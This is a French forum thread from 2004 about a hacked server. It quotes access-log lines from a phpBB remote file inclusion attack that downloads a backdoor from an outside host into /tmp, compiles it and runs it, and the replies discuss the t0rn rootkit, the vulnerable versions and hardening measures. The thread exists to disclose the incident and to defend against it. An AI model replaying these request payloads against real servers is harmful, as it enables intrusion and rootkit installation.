Un serveur que j'héberge a ete hacké (rootkit) vendredi dernier.
Pour ceux que ca interesse, voila la technique que le gars a utilisé :
66.6.80.X - - [18/Apr/2004:01:05:29 +0200] "GET /forums/includes/db.php?phpbb_root_path=http://sperwill-usa.com/(...)
&dbms=mysql&phpEx=txt&cmd=wget%20sperwill-usa.com/acatalog/bacdoor.c%20-P%20/tmp HTTP/1.0" 200 145 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.6.80.X - - [18/Apr/2004:01:05:54 +0200] "GET /forums/includes/db.php?phpbb_root_path=http://sperwill-usa.com/(...)
&dbms=mysql&phpEx=txt&cmd=gcc%20/tmp/bacdoor.c%20-o%20/tmp/abc HTTP/1.0" 200 145 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.6.80.X - - [18/Apr/2004:01:06:01 +0200] "GET /forums/includes/db.php?phpbb_root_path=http://sperwill-usa.com/(...)
&dbms=mysql&phpEx=txt&cmd=/tmp/abc HTTP/1.0" 200 182 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Bien evident, le serveur en question n'avait pas les options safe_mode à off ni d'open_basedir de specifié...
Le rootkit qui a été installé ensuite est t0rn's v8 sans doute via la faille ptrace ou mremap (ben oui, kernel foireu : 2.4.18)
Ceci est juste a titre informatif ...
PS : ca fait quand meme mal de voir que ca a été hacké par un mec sous Windows :D (sauf si il force son User Agent)
PS 2 : j'ai enleve le h de http pour eviter que templeet l'interprete :)
# hmmm....
Posté par CopainJack (site web personnel, Mastodon) . Évalué à 2.
vulnerable:
* phpBB Group phpBB 2.0 RC3
* phpBB Group phpBB 2.0 RC2
* phpBB Group phpBB 2.0 RC1
* phpBB Group phpBB 2.0 Beta 1
Ca date de mars 2002.
Tu vas facturer tes heures aux gestionnaires du forum j'espère ? (sachant que la dernière version de phpBB est la 2.0.8a)
# Re: Server Hacked
Posté par Guillaume Plessis (site web personnel) . Évalué à 0.
Ce genre d attaque est de plus en plus repandue malheureusement... Pour limiter les degats : openbasedir, /tmp en noexec, patch openwall ou autre sur un noyau a jour...
Bon courage pour tout remettre d applomb en tout cas.
[^] # Re: Server Hacked
Posté par Benjamin (site web personnel) . Évalué à 2.
chmod 0 /usr/bin/gcc
avant de pouvoir compiler qqchose, il faut DEJA etre root ;)
sinon, un php sans safe_mode par défaut (mode dans lequel phpbb fonctionne trrrès bien) c'est un peu dangereux non ? ;)
sur ce bon courage, un rootkit c'est parfois plus difficile de s'en débarasser s'il n'est pas venu tout seul ...
[^] # Re: Server Hacked
Posté par Guillaume Plessis (site web personnel) . Évalué à 2.
Ensuite, laisser des compilos sur une bécane ou il n'y en a besoin que rarement, il faut absolument éviter. Perso, je les installe et désinstalle selon les besoins, mais je ne les laisse pas trainer.
PS : J oubliais : pas de support des modules dans le noyau, tout en dur, ca evite le chargement de modules malicieux. Sur ces bons conseils, messieurs, bonne journee
[^] # Re: Server Hacked
Posté par jojo2002 . Évalué à 1.
[^] # Re: Server Hacked
Posté par Sylvestre Ledru (site web personnel) . Évalué à 1.
1) c'est pas mon serveur
2) j'ai exposé certaines methodes de protection dans mon message :)
# Re: Server Hacked
Posté par Ackira . Évalué à 1.
bindtty - like bindshell, but with tty
Features:
- it can handle any number of clients
- allocates tty for each session
- no using termios.h/tty.h: compiles on most of gccs
- linux specific ;(
Personnellement j'appelle pas ça un super rootkit ... Il aurait pu frapper bien plus fort (et au moins effacer tes logs).
Ensuite écoute ce qu'on dit plus haut : gcc n'as rien à faire sur un serveur de prod, les failles sont connues depuis 2 ans, met ta machine à jour !!!
J'imagine que tu as qd même tout corrigé.
[^] # Re: Server Hacked
Posté par Sylvestre Ledru (site web personnel) . Évalué à 1.
Deja, le rookit est t0rn's v8.
Le bindtty, c'est le script qu'il a utiliser pour ouvrir un shell.
Ensuite, C'EST PAS MA MACHINE !!!
Mes machines sont a jour, avec un apache/php configuré de maniere correct avec des sites mis a jour. merci pour elles
[^] # Re: Server Hacked
Posté par Ackira . Évalué à 2.
[^] # Re: Server Hacked
Posté par Ben . Évalué à 1.
Alors ils se sont faits hacker eux aussi?
[^] # Re: Server Hacked
Posté par Sylvestre Ledru (site web personnel) . Évalué à 1.
au choix :)
# Re: Server Hacked
Posté par mcjyc (site web personnel) . Évalué à 6.
ServerSignature Off
ServerTokens Prod
comme ca, le mechant ne voit que "apache" au lieu de
"apache ma vie, mon oeuvre, ma femme etc... ma distrib...blah blah blah..."
comme ca, on peut avoir un systeme pas forcement à jour(ce qui n'est pas bien), mais on passe les mailles du filet de ceux qui cherchent par defaut un type de trou de secu...
le cloaking device d'apache en quelque sorte...
bon, c'etait mes deux centimes...
bonne journee tout le monde.
ps : pour ceux qui utilisent mozilla, je conseillerai l'utilisation de livehttpdheader... c'est super pratique...
[^] # Re: Server Hacked
Posté par gradix . Évalué à 3.
http://livehttpheaders.mozdev.org/(...)
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.